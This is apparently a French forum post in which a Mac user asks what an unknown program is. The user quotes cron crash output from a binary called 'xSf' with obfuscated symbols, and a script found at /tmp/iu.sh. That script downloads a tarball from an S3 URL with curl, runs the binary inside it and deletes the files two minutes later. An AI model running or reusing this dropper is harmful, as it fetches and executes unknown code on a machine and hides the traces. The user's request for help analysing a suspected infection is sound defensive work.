Grâce à la fonction de messagerie du terminal, j'ai appris qu'une sorte de tâche cron était exécutée avec des erreurs.
Le mail du cron donne cette information :
2018-08-02 23:47:22.698 xSf[717:27543] *** Terminating app due to uncaught exception 'NSInvalidArgumentException', reason: '*** -[_NSPlaceholderData initWithBase64EncodedString:options:]: nil string argument'
*** First throw call stack:
(
0 CoreFoundation 0x00007fff57d622db __exceptionPreprocess + 171
1 libobjc.A.dylib 0x00007fff7eeffc76 objc_exception_throw + 48
2 CoreFoundation 0x00007fff57df3d7d +[NSException raise:format:] + 205
3 Foundation 0x00007fff59e028ee -[NSData(NSData) initWithBase64EncodedString:options:] + 84
4 xSf 0x000000010b54fd19 INJECTOR_decryptData_RNCryptor + 121
5 xSf 0x000000010b55010a -[l196gKNh f27WaC8u:path:] + 410
6 xSf 0x000000010b54ff2e -[l196gKNh s7PJWuXO:] + 158
7 xSf 0x000000010b552cd1 main + 225
8 libdyld.dylib 0x00007fff7fb19015 start + 1
)
libc++abi.dylib: terminating with uncaught exception of type NSException
/tmp/iu.sh: line 6: 717 Abort trap: 6 ./xSfIl semble que cela ait été exécuté par un script situé dans : ~/Library/sandastros.np/sandastros.np dont je ne peux pas lire ou décrypter le contenu.
J'ai vérifié que script situé dans /tmp/iu.sh qui contient les éléments suivants :
#!/bin/bash
/usr/bin/curl -s -L -o /var/tmp/xSf.tgz "https://s3.amazonaws.com/xsfer/xSf.tgz"
mkdir -p /var/tmp/xSf
tar -xzf /var/tmp/xSf.tgz -C /var/tmp/xSf/
cd /var/tmp/xSf/
./xSf
func_cccc(){
sleep 120
rm -rf /var/tmp/xSf
rm -rf /var/tmp/xSf.tgz
}
func_cccc &Cette URL est accessible mais je ne voulais pas télécharger et ouvrir le fichier tar. Le site /tmp sont correctement configurées, bien que les permissions du dossier iu.sh a mon utilisateur comme propriétaire, donc il semble autoriser l'installation de tout ce à quoi j'aurais pu donner des permissions.
Une idée de ce que c'est ?
